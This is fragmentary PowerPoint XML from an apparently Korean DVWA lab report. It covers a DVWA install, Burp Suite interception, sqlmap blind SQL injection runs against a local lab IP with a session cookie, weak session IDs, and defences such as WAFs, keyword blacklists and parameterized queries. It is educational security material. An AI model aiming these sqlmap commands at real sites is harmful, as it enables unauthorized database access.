          </a:p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명령을 통해 예전 점검 과정을 삭제해준다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A067C9E-FF39-486B-9842-C6214CC6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2782905"/>
            <a:ext cx="4105275" cy="4095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8563BF9-2F44-4373-AFE6-A788409D4D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599378" y="5564444"/>
            <a:ext cx="5913236" cy="127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sqlmap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-u "http://192.168.131.1/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dvwa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/vulnerabilities/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sqli_blind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/" --cookie="security=medium; PHPSESSID=cms95nrcs5khjsdmq057nn1gc2" --data "id=1&amp;Submit=Submit" -p id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F54E7D-6AC6-49A2-B8DF-EA3800A2B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21" y="6837650"/>
            <a:ext cx="5848350" cy="571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98D6E48C-DD9F-409C-A0D8-8A20DFD048F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632035" y="7756494"/>
            <a:ext cx="5913236" cy="12732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POST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방식을 이용하여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–-data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옵션에 사용자를 입력해준다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930603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8B64ED0-FB01-4B95-9A6B-CFFCAF6D14D9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625600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D15D5D64-8FEA-4030-A7D6-E1DDF14D33E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454226" y="6316657"/>
            <a:ext cx="5913236" cy="19637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Medium Level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에서는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AND/OR time-based blind’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취약점이 탐지되었다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이 취약점은 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/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거짓 조건을 시간차로 판별하기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떄문에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sqlmap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작업속도가 매우 느리다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하지만 불가능한 경우는 아니기에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low level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과 마찬가지로 데이터베이스를 열람 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F17B9D-697E-4486-8507-F913CD4D7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2706681"/>
            <a:ext cx="5876925" cy="26574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1559487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6D215AB-CF36-4268-8665-2F5EA5F3E0A8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625600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D15D5D64-8FEA-4030-A7D6-E1DDF14D33E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479335" y="7191648"/>
            <a:ext cx="5913236" cy="918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High Level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에서는 쿠키에 저장된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id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값을 이용하여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문을 만든다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69F399-F941-4581-87D6-0FAA65715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35" y="2060330"/>
            <a:ext cx="5906284" cy="45239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844965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255919-B43B-4C7E-BFD8-A6C4BA5B7443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625600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D15D5D64-8FEA-4030-A7D6-E1DDF14D33E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521796" y="5437740"/>
            <a:ext cx="5913236" cy="14921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#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sqlmap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-u "http://192.168.131.1/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dvwa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/vulnerabilities/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sqli_blind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/" --cookie="security=medium; PHPSESSID=cms95nrcs5khjsdmq057nn1gc2" --data "id=1&amp;Submit=Submit" -p id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B3AECA-6884-4A40-BF79-9C14712FD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64" y="2072148"/>
            <a:ext cx="5829300" cy="32480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85A947-7595-4D6A-8245-91F6A3EB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39" y="6848670"/>
            <a:ext cx="5838825" cy="5524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A7350D83-B3DF-451D-A10D-F5B7B819FEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563764" y="7692408"/>
            <a:ext cx="5913236" cy="705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Sqlmap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*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문자를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발견시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해당 부분에 대한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 Injection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취약점을 점검한다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520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폴더들 권한주기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921" y="7407824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524694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console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cp /root/Downloads/DVWA-2.0.1.zip /root/ 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unzip DVWA-2.0.1.zip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mv DVWA-2.0.1 /opt/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lampp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htdocs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cd /opt/lamp/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htdocs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/config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cp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config.inc.php.dist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config.inc.php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mv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config.inc.php.dist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config.inc.php.bak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796D5F7C-AD04-4370-8FCD-1A340182A91B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529646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622DFC7B-6467-4D58-A1D9-99FD310789B2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625600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A7350D83-B3DF-451D-A10D-F5B7B819FEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472383" y="6623874"/>
            <a:ext cx="5913236" cy="705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SQLmap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로는 분석이 실패하여 수동으로 취약점 분석을 시도한다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E29258-0415-4FCC-A73D-4AC01DB57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49" y="2003328"/>
            <a:ext cx="4767383" cy="42428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7DBA7744-7318-4318-A87B-2522907CC7A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472383" y="7597039"/>
            <a:ext cx="5913236" cy="11024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High Level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에서는 사용자를 입력하는 부분과 결과가 출력되는 부분이 분리되어 있으며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Location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헤더가 아닌 자바스크립트로 연결되기 때문에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sqlmap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으로 는 공격이 불가능하다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586430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1857969-7C3F-464F-ACBF-113A00E69094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나눔스퀘어_ac Bold" panose="020B0600000101010101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625600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A7350D83-B3DF-451D-A10D-F5B7B819FEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="6984565"/>
            <a:ext cx="5913236" cy="705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은 존재하지 않는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User ID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인데 첫번쨰 입력에서는 존재한다고 출력이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되있다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여기서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구문삽입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취약점이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존재한다는걸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알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4FA8CFA-DB27-4162-ACC0-6769C90AC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686" y="1803282"/>
            <a:ext cx="3552627" cy="2299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D21938-35A4-458F-A2A3-B46311AED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685" y="4324566"/>
            <a:ext cx="3552627" cy="21217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9578494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F4A8069-D88A-495C-9B3A-44C17FFF140D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SQL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 </a:t>
            </a:r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Injection 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대응방안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625600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A7350D83-B3DF-451D-A10D-F5B7B819FEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472383" y="1671075"/>
            <a:ext cx="5913236" cy="77877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웹 방화벽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(WAF)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도입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웹 방화벽은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HTTP/HTTPS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응용 계층의 패킷 내용을 기준으로 패킷의 보안성을 평가하고 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(Rule)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에 따라 제어한다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SQL Injection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(Rule)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을 설정하여 공격에 대비할 수 있다</a:t>
            </a:r>
            <a:b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457200" marR="0" lvl="0" indent="-4572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물리적 웹 방화벽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기업의 규모가 어느정도 되거나 보안이 중시되는 환경 또는 예산이 충분한 환경에서는 물리적인 전용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WAF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사용을 권장한다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어플라이언스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형태의 제품을 사용하거나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SECassS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형태의 클라우드 기반의 솔루션을 도입할 수도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논리적 웹 방화벽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공개 웹 방화벽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)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공개 웹 방화벽은 물리적인 장비가 아닌 논리적인 구성으로 웹 방화벽 역할을 수행한다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윈도우 서버 환경에서는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WebKnight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아파치 서버 환경에서는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ModSecurity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를 사용할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＊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WebKnight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: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웹서버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앞단에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필터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(ISAPI)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방식으로 동작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웹서버로 들어오는 모든 웹 요청에 대해 사전에 정의한 필터 룰에 따라 검증하고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SQL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인젝션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공격 등을 사전에 차단 할 수 있다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＊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ModSecurity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: OWASP(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세계적인 웹 보안 커뮤니티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에서 무료 탐지 룰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(CRS)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을 제공하며 이를 통해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OWASP TOP 10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취약점을 포함한 웹 해킹 공격으로부터 홈페이지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웹서버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보호가 가능하다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73293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A97C886-3340-40BD-B79D-5FF7CFE74480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SQL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 </a:t>
            </a:r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Injection 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대응방안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625600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A7350D83-B3DF-451D-A10D-F5B7B819FEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472383" y="1671075"/>
            <a:ext cx="5913236" cy="77877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시큐어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코딩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1.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입력값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유효성 검사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외부에서 들어오는 모든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입력값은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모두 의심의 대상이다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외부입력값은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이용자가 직접 타이핑한 값일 수도 있지만 타이핑 하지 않고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Burp Suite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와 같은 프록시 툴을 이용하여 중간에 값을 변조할 수 있는 외부 값도 포함한다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블랙 리스트 방식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SQl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쿼리의 구조를 변경시키는 문자나 키워드를 제한하는 방식이다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아래와 같은 문자를 블랙리스트로 미리 정의하여 해당 문자를 공백 등으로 치환하는 방식으로 방어한다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특수문자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: ‘, ”, =, &amp;, |, !, (, ), {, }, $, %, @, #, --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예 약 어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: UNION, GROUP BY, IF, COLUMN, END, INSTANCE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함 수 명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: DATABASE(), CONCA(), COUNT(), LOWER()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 startAt="2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화이트 리스트 방식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블랙리스트 방식보다 보안성 측면에서는 훨씬 강력한 방법이다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블랙리스트 방식에서는 금지된 문자 외에는 모두 허용하지만 화이트리스트 방식에서는 허용된 문자를 제외하고는 모두 금지하는 방식이다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＊지정된 문자만을 허용하기 때문에 웹 애플리케이션의 기능에 따라 화이트리스트를 다르게 유지해야 할 필요가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＊개별 문자를 일일이 하나씩 모두 정의하는 것보다 정규식을 이용해서 범주화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/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패턴화 시키는 것이 유지보수에 더 유리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376375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A35A4B7F-D72F-4757-92DB-BAF4E44F3B9B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SQL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 </a:t>
            </a:r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Injection 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대응방안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625600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A7350D83-B3DF-451D-A10D-F5B7B819FEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472383" y="1671076"/>
            <a:ext cx="5913236" cy="7802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동적 쿼리 사용 제한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457200" marR="0" lvl="0" indent="-4572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동적 쿼리 금지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웹 애플리케이션이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DB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와 연동할 때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정적쿼리만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사용한다면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SQL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인젝션을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신경 쓸 필요가 없다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하지만 근래의 웹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ㅐ플리케이션은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모두 사용자와 상호작용하며 동적인 기능을 기반으로 하기 때문에 동적 쿼리 사용은 거의 필수에 가깝다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 startAt="2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매개변수화된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쿼리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구조화된 쿼리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사용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동적 쿼리를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정적쿼리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처럼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사용하는 기법이다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쿼리 구문에서 외부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입력값이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SQL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구문의 구조를 변경하지 못하도록 정적구조로 처리하는 방식인데 이를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파라메타화된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(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매개변수화된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)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쿼리라 한다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  <a:b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</a:b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3.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오류 메시지 출력 제한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DB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  <a:t> 오류 출력 제한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DB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의 오류 정보를 그대로 이용자에게 노출해서는 안된다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DB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오류 정보에는 개발자들이 쉽게 디버깅할 수 있도록 내부 정보를 상세히 알려주는 경우가 많다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해커는 이 정보를 바탕으로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DB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구조를 파악하고 데이터 유출을 시도할 것이다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따라서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DB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오류가 적나라하게 이용자에게 노출되지 않도록 커스텀 오류 페이지를 제공해야 한다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  <a:b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나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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2)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추상화된 안내 메시지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너무 자세한 안내 메시지도 주의할 필요가 있다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로그인을 실패했을 때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, ID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가 틀렸는지 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Password</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" alt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가 틀렸는지 대한 자세한 정보는 오히려 해커들에게 공격의 범위를 좁혀주는 결과로 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" alt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이어질수있다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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＊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’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로그인 정보가 일치하지 않습니다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‘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와 같은 추상적인 메시지 활용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45631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A7B8881-E74E-4B1E-9888-9F3CFDCEAA28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SQL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 </a:t>
            </a:r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Injection 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대응방안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625600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A7350D83-B3DF-451D-A10D-F5B7B819FEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472383" y="1671075"/>
            <a:ext cx="5913236" cy="77877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보안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457200" marR="0" lvl="0" indent="-4572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DB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계정 분리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관리자가 사용하는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계정과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웹애플리케이션이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접근하는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DB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계정은 반드시 분리되어야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2. DB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계정 권한 제한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웹 애플리케이션이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에 액세스하는 전용 계정을 생성하고 이 계정에는 최소 권한 원칙에 입각하여 꼭 필요한 권한만 할당한다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웹 애플리케이션이 제공하는 기능만 수행 가능하도록 권한을 제한한다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＊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SELECT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권한과 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INSERT, UPDATE, DELETE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권한을 분리하여 서로 다른 계정으로 접근하도록 구성할 수도 있음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이 경우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SELECT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권한으로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SQL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인젝션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공격이 들어와도 데이터 베이스를 업데이트 할 수 없게 됨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3.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기본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/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확장 저장 프로시저 제거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데이터베이스가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설치될때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기본적으로 포함된 프로시저들을 꼭 필요한 경우가 아니면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제거하는것이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좋다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860740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FC4E4A47-AC37-465B-9741-33C578D9797F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254003" y="66947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/>
              <a:ea typeface="나눔스퀘어_ac Bold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SQL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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
              </a:rPr>
              <a:t>Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
              </a:rPr>
              <a:t>대응방안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나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3-10) SQL Injection(Blind)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나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
              <a:cs typeface="+mn-cs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72381" y="1625600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A7350D83-B3DF-451D-A10D-F5B7B819FEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472383" y="1671075"/>
            <a:ext cx="5913236" cy="77877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취약점 점검과 모니터링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1.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지속적 취약점 점검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인젝션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취약점을 정기적으로 점검해야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모의 해킹을 시도하거나 웹 취약점 점검 툴을 이용해 주기적인 취약점 점검을 권장한다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비즈니스가 활발히 진행되는 경우 웹사이트의 업데이트도 빈번하다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이때 간단한 이벤트 페이지라 하더라도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DB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연동을 하는 경우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언제나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SQL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취약점에 노출될 수 있다는 것을 명심한다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＊모든 곳에 보안을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틈틈히했어도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이벤트 페이지 하나 때문에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해킹당하는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사례가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비번히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 있음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2.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/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>로깅과 모니터링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SQL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인젝션은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많은 경우의 오류를 유발시키거나 동일한 페이지나 기능을 반복적으로 호출하는 형태로 공격이 이루어진다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 500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오류가 많이 발생하거나 동일한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IP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에서 동일한 페이지를 반복적으로 호출할 경우 요주의 대상으로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주의깊게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 살펴봐야한다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.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＊이상현상에 대한 기준과 임계를 설정하고 해킹 시도로 판단될 시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Dotum" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>즉각 알림이 전송되어 바로 조사가 가능한 체계를 갖추는 것이 좋음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292929"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Dotum" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101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589769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9A351A-DCCD-4BAC-94BF-632B61B5151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7D94560D-C34C-4211-8812-E8601EBA9B8D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16541F1C-A245-42F8-8FC8-701268C41998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제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE419C1-CCEB-48FC-84BE-079C3DB5FC42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2385813" y="3048507"/>
            <a:ext cx="4485405" cy="135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Weak Session IDs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66579-EDC9-4324-B476-6FF19928A34D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99261" y="3309457"/>
            <a:ext cx="1912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55016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Week Session ID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대상 웹 서버에 접근하면 식별을 하기 위해 세션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사용자에게 할당한다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세션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단순해 패턴을 파악하기 쉬우면    공격자가 쿠키 값 변조를 통해 다른 사용자로의 위장 및 권한 상승 등을 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30897336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" r="1735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브라우저에서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Proxy server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지정하기 위해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Preferences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페이지로 들어간다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4592954" y="4445003"/>
            <a:ext cx="1791971" cy="15557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663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Database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사전 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7AC7F661-D01C-460F-A267-60C2DDE80A1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3" r="10973"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="519460" y="1951874"/>
            <a:ext cx="5911850" cy="4482171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681595"/>
            <a:ext cx="5913238" cy="25513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 설정 페이지에서 마지막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줄을 빼고는 모두 녹색으로 되어있어야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만약 빨간색으로 에러가 뜨는 줄이 있다면 나중에 사용할 때 설정오류가 날 가능성이 높다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allow_url_include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reCAPTCHA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key, ../../hackable/uploads/, ../../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tmp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/phpids_log.txt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들의 설정을 바꾸어 주어야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BF3E27DD-1FEF-41BD-8C2F-B4AA479FA542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39087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r="1766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4781550" y="6000750"/>
            <a:ext cx="876300" cy="21907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60862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r="381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609600" y="3390900"/>
            <a:ext cx="5524500" cy="457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56331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0" b="2800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실습을 진행하기에 앞서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를 실행한다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615950" y="2433213"/>
            <a:ext cx="4006850" cy="2236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8077064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r="1766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5862520" y="6287266"/>
            <a:ext cx="457198" cy="252638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8787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5644055" y="6271500"/>
            <a:ext cx="698572" cy="28417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346928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" b="528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패킷을 가로채 분석 및 수정 가능한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proxy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메뉴를 이용한다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1211692" y="2212324"/>
            <a:ext cx="270266" cy="1682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92646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" b="409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기본적으로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Intercept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되어 있는데 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1697466" y="2693336"/>
            <a:ext cx="545671" cy="1689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26539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3" b="563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재실행하기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Intercept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Off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했다가 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1697466" y="2693336"/>
            <a:ext cx="545671" cy="1689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62259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" b="254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Intercept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설정해준다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Intercept is on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 서버와 사용자 사이에서 통신이 되는 요청과 응답 패킷을 가로챔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Intercept is off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패킷을 잡지 않고 자동으로 포워드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시켜줌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1678416" y="2674286"/>
            <a:ext cx="545671" cy="16892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79287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8E45BFC-0143-40B3-AFF8-831D1D0ED73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내용 개체 틀 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4C88A28-E9A2-419A-8900-B3F8AF0392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1276" y="4906135"/>
            <a:ext cx="5724525" cy="1733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FCF8D15-E04B-4010-92D1-95C596DA6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83"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="508202" y="6740433"/>
            <a:ext cx="5721451" cy="21239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A7E6887-EBC6-4E5D-8062-F8A5BFDF6DCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1714500" y="6275068"/>
            <a:ext cx="742950" cy="23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FBFCF30-8F1A-4389-BD1A-1ED8FF7A1183}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1682533" y="8457653"/>
            <a:ext cx="381251" cy="23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4A2F8F-D8E4-4F9E-B91B-C3874C462870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="963643" y="2458545"/>
            <a:ext cx="4930714" cy="1995976"/>
            <a:chOff x="963643" y="2092782"/>
            <a:chExt cx="4930714" cy="199597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32F504F-1C12-4CDC-ACAE-016F8BF592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713"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="963643" y="2127853"/>
              <a:ext cx="1302373" cy="86925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773B2D6-2962-4D1E-B0AF-AAD77601B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1984" y="2092782"/>
              <a:ext cx="1302373" cy="869259"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A8912F32-ACF3-40E7-A489-F2E2D042D4FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2266016" y="3128363"/>
              <a:ext cx="2046904" cy="960395"/>
              <a:chOff x="4233862" y="2062313"/>
              <a:chExt cx="1902778" cy="112748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75ADFABA-7DE9-4D8F-ABD4-F0D656C185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5569" r="3553" b="1814"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4233862" y="2068281"/>
                <a:ext cx="1862138" cy="1121512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02EE158-4715-4E5D-9BAE-580059C161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7572" t="46199" r="2171" b="26741"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5275580" y="2823202"/>
                <a:ext cx="861060" cy="327661"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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E857402-31E7-48A5-BD15-820C39CA16B5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5326380" y="2062313"/>
                <a:ext cx="742950" cy="231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489344B-D7CE-4A98-96F6-02BDE200442D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4372070" y="2290913"/>
                <a:ext cx="898970" cy="23177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C87493CB-FCF3-46A5-878D-0DEEC1D79959}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2512260" y="2633753"/>
              <a:ext cx="172255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텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23EEBBF5-17F3-4C41-85A4-03577D37D146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1782437"/>
            <a:ext cx="5721451" cy="56755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Level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impossible -&gt; low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로 수정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FA30795-8AC2-4BDA-87DE-95779DB5A671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508202" y="2429695"/>
            <a:ext cx="5724525" cy="21001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제목 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{667E3F72-FC91-4F84-AE3B-782BE16FB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698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캡챠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키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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받아오기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CAB00049-9012-45BA-A2F0-4C2878BD0A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3" r="1097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reCAPTCHA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key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Missing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떠 있는 것을 확인 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3"/>
              </a:rPr>
              <a:t>https://www.google.com/recaptcha/admin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링크로 들어가서 회원가입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하고 키를 받아온다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7F5EBFD2-C25E-45CF-A2C3-51041A50D2C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6793030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AD7FC41E-FE1F-488D-9975-6FED498CAF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0821" y="2310855"/>
            <a:ext cx="5296359" cy="1577477"/>
          </a:xfr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1B8733C-FD2C-45FC-9BE2-23173A513DE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="967740" y="2907030"/>
            <a:ext cx="742950" cy="2317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92F86177-1478-4BE1-9826-FA16E768B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21" y="4630280"/>
            <a:ext cx="5296359" cy="17443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3891B1-7D03-4F21-A271-49A0295206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97"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="780821" y="6525028"/>
            <a:ext cx="5296359" cy="1745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9B01370-294A-45EF-9128-70D3177680EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733746" y="5930417"/>
            <a:ext cx="963697" cy="180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F7FD4E7-93F8-4BFF-B0BE-668CF0033056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1621731" y="7853218"/>
            <a:ext cx="876088" cy="163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F087CED-D690-441D-AF92-36506DE837E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239520" y="3528548"/>
            <a:ext cx="572058" cy="146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텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{526BEF77-DD99-4394-A4B1-F818BADE7D93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618604" y="1699886"/>
            <a:ext cx="5902671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Level : low / Generate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실행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216F73F9-1BD8-4B9B-9BEF-7C1BAF12487A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627311" y="4046850"/>
            <a:ext cx="5902671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Generate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반복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실행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8E379D1A-7A77-404E-B78C-337875AE47DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="927100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Security Level : Low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7603009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284AC789-4BA2-4DB0-8117-854EF65989CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466204" y="4038317"/>
            <a:ext cx="6391796" cy="129518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특징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일반적인 규칙으로 값이 상승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/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암호화되어있지않음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         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       Session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값이 유추가 쉽기 때문에 탈취용이         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2A74C6D-04F2-4A55-9E94-C36BB8EA740E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="537659" y="2498428"/>
            <a:ext cx="4432803" cy="1348156"/>
            <a:chOff x="524596" y="2602932"/>
            <a:chExt cx="4432803" cy="134815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D5DBAFE-3C97-423A-9A57-EC62C7BFD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7326" r="3350" b="3557"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="547457" y="2649364"/>
              <a:ext cx="4199803" cy="27698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52F5B73-3120-4093-B15B-B2109068A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0648" r="25582" b="24868"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="587387" y="2933981"/>
